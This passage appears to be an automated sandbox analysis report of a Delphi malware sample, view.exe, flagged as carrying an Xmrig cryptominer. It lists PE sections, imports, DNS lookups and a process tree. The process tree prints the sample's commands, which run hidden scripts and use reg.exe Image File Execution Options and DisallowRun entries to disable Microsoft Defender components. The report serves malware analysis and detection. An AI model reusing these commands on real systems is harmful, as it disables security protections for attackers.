                                                                                                              call 00007F4ED083E3F7h
                                                                                                              jne 00007F4ED084DEC5h
                                                                                                              lea edx, dword ptr [ebp-24h]
                                                                                                              mov eax, 00000001h
                                                                                                              call 00007F4ED083CD9Ch
                                                                                                              mov eax, dword ptr [ebp-24h]
                                                                                                              push eax
                                                                                                              lea eax, dword ptr [ebp-28h]
                                                                                                              push eax
                                                                                                              lea edx, dword ptr [ebp-2Ch]
                                                                                                              xor eax, eax
                                                                                                              call 00007F4ED083CD8Ah
                                                                                                              mov eax, dword ptr [ebp-2Ch]
                                                                                                              mov ecx, 00000003h
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x170000xa50.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x1763fcc.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000x18b8.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x190000x18.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              CODE0x10000x130440x13200False0.548279207516data6.43594483834IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              DATA0x150000x60c0x800False0.388671875data3.51862601439IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              BSS0x160000xca50x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .idata0x170000xa500xc00False0.36328125data4.26186269995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .tls0x180000xc0x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x190000x180x200False0.05078125data0.20448815744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x1a0000x18b80x1a00False0.717397836538data6.52836723013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x1c0000x1763fcc0x1764000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              RT_ICON0x1c7300x12428dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                                              RT_ICON0x2eb580xea8dataEnglishUnited States
                                                                                                              RT_ICON0x2fa000x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                              RT_ICON0x302a80x6c8dataEnglishUnited States
                                                                                                              RT_ICON0x309700x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                              RT_ICON0x30ed80x8dbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                              RT_ICON0x317b40x4228dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                                              RT_ICON0x359dc0x25a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                                              RT_ICON0x37f840x1a68dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                                              RT_ICON0x399ec0x10a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                                              RT_ICON0x3aa940x988dataEnglishUnited States
                                                                                                              RT_ICON0x3b41c0x6b8dataEnglishUnited States
                                                                                                              RT_ICON0x3bad40x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                              RT_STRING0x3bf3c0x18edataEnglishUnited States
                                                                                                              RT_STRING0x3c0cc0x6cdataEnglishUnited States
                                                                                                              RT_STRING0x3c1380x15cdata
                                                                                                              RT_STRING0x3c2940x208data
                                                                                                              RT_STRING0x3c49c0xecdata
                                                                                                              RT_STRING0x3c5880x198data
                                                                                                              RT_STRING0x3c7200x3b4data
                                                                                                              RT_STRING0x3cad40x37cdata
                                                                                                              RT_STRING0x3ce500x2a0data
                                                                                                              RT_RCDATA0x3d0f00x1269a76Zip archive data, at least v1.0 to extract
                                                                                                              RT_RCDATA0x12a6b680x47c9dbZip archive data, at least v1.0 to extract
                                                                                                              RT_RCDATA0x17235440x29000PE32 executable (console) Intel 80386, for MS Windows
                                                                                                              RT_RCDATA0x174c5440xb200PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                              RT_RCDATA0x17577440x78ddata
                                                                                                              RT_RCDATA0x1757ed40x274fdata
                                                                                                              RT_RCDATA0x175a6240x25672data
                                                                                                              RT_RCDATA0x177fc980xbedata
                                                                                                              RT_RCDATA0x177fd580x10data
                                                                                                              RT_RCDATA0x177fd680xb0data
                                                                                                              RT_RCDATA0x177fe180xf6data
                                                                                                              RT_GROUP_ICON0x177ff100xbcdataEnglishUnited States
                                                                                                              DLLImport
                                                                                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                              user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                              kernel32.dllWriteFile, WaitForSingleObject, VirtualQuery, Sleep, SetFilePointer, SetEvent, SetEndOfFile, ResetEvent, ReadFile, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GetVersionExA, GetTickCount, GetThreadLocale, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCPInfo, GetACP, FreeLibrary, FormatMessageA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeviceIoControl, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                              user32.dllMessageBoxA, LoadStringA, GetSystemMetrics, CharNextA, CharToOemA
                                                                                                              kernel32.dllSleep
                                                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                              winmm.dllwaveOutGetNumDevs
                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Aug 24, 2021 03:16:49.120443106 CEST5223853192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:16:49.157990932 CEST53522388.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:16:49.262757063 CEST4987353192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:16:49.298051119 CEST53498738.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:16:49.428050995 CEST5319653192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:16:49.464857101 CEST53531968.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:16:50.717505932 CEST5677753192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:16:50.726416111 CEST5864353192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:16:50.749680042 CEST53567778.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:16:50.767349005 CEST53586438.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:16:50.808998108 CEST6098553192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:16:50.833276033 CEST53609858.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:16:52.468636036 CEST5020053192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:16:52.505737066 CEST53502008.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:20.803363085 CEST5128153192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:20.835573912 CEST53512818.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:24.202090979 CEST4919953192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:24.253823042 CEST53491998.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:41.630467892 CEST5062053192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:41.689824104 CEST53506208.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:42.083308935 CEST6493853192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:42.171365023 CEST53649388.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:42.855802059 CEST6015253192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:42.890939951 CEST53601528.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:43.151299953 CEST5754453192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:43.186260939 CEST53575448.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:43.509784937 CEST5598453192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:43.543282986 CEST53559848.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:43.865325928 CEST6418553192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:43.900312901 CEST53641858.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:44.188659906 CEST6511053192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:44.228985071 CEST53651108.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:44.375010967 CEST5836153192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:44.409914970 CEST53583618.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:44.893668890 CEST6349253192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:44.925688982 CEST53634928.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:45.375916004 CEST6083153192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:45.408005953 CEST53608318.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:45.693017960 CEST6010053192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:45.727832079 CEST53601008.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:57.850531101 CEST5319553192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:57.882913113 CEST53531958.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:17:57.944839001 CEST5014153192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:17:57.994570971 CEST53501418.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:18:30.898335934 CEST5302353192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:18:30.949254036 CEST53530238.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:18:31.616899014 CEST4956353192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:18:31.657749891 CEST53495638.8.8.8192.168.2.3
                                                                                                              Aug 24, 2021 03:19:12.764436960 CEST5135253192.168.2.38.8.8.8
                                                                                                              Aug 24, 2021 03:19:12.801887035 CEST53513528.8.8.8192.168.2.3
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Aug 24, 2021 03:16:49.262757063 CEST192.168.2.38.8.8.80xd81aStandard query (0)clientconfig.passport.netA (IP address)IN (0x0001)
                                                                                                              Aug 24, 2021 03:19:12.764436960 CEST192.168.2.38.8.8.80x5ca3Standard query (0)auth11.aeroadmin.comA (IP address)IN (0x0001)
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Aug 24, 2021 03:16:49.298051119 CEST8.8.8.8192.168.2.30xd81aNo error (0)clientconfig.passport.netauthgfx.msa.akadns6.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Aug 24, 2021 03:16:49.464857101 CEST8.8.8.8192.168.2.30x91cdNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Aug 24, 2021 03:19:12.801887035 CEST8.8.8.8192.168.2.30x5ca3No error (0)auth11.aeroadmin.com37.48.87.53A (IP address)IN (0x0001)

                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Start time:03:17:00
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Users\user\Desktop\view.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\view.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:24618496 bytes
                                                                                                              MD5 hash:07DEB2AC0EC36137243459603D1E7EE0
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000003.236853834.0000000003924000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Start time:03:17:06
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Start time:03:17:08
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\StartPublic.cmd' '
                                                                                                              Imagebase:0xbd0000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Start time:03:17:09
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Start time:03:17:10
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:choice /n /c yn /t 1 /d y
                                                                                                              Imagebase:0xd10000
                                                                                                              File size:28160 bytes
                                                                                                              MD5 hash:626F7BE965216FEAC7A3C0B4D3751BA2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Start time:03:17:13
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\ProgramData\screen.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\ProgramData\screen.exe' elevate 'C:\ProgramData\screen.exe' exec hide 'C:\Users\Public\Public.cmd'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:45568 bytes
                                                                                                              MD5 hash:A1CD6A64E8F8AD5D4B6C07DC4113C7EC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 00000008.00000002.251856929.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 12%, Virustotal, Browse
                                                                                                              • Detection: 17%, Metadefender, Browse
                                                                                                              • Detection: 14%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Start time:03:17:14
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\ProgramData\screen.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\ProgramData\screen.exe' exec hide 'C:\Users\Public\Public.cmd'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:45568 bytes
                                                                                                              MD5 hash:A1CD6A64E8F8AD5D4B6C07DC4113C7EC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Start time:03:17:14
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Public.cmd' '
                                                                                                              Imagebase:0xbd0000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Start time:03:17:14
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Start time:03:17:15
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe' /v Defender1 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Start time:03:17:16
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCncProxy.exe' /v Defender2 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Start time:03:17:17
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Start time:03:17:17
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseIR.exe' /v Defender3 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:18
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseNdr.exe' /v Defender4 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:19
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseSampleUploader.exe' /v Defender5 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:20
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCE.exe' /v Defender6 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:20
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe' /v Defender7 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:21
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe' /v Defender8 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:23
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe' /v Defender9 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:23
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:24
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe' /v Defender10 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:25
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OfflineScannerShell.exe' /v Defender11 /t REG_SZ /d 'cmd.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:26
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender1 /t REG_SZ /d 'MsSense.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:27
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender2 /t REG_SZ /d 'SenseCncProxy.exe' /f
                                                                                                              Imagebase:0x13c0000
                                                                                                              File size:59392 bytes
                                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Start time:03:17:28
                                                                                                              Start date:24/08/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                              Imagebase:0x7ff7488e0000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
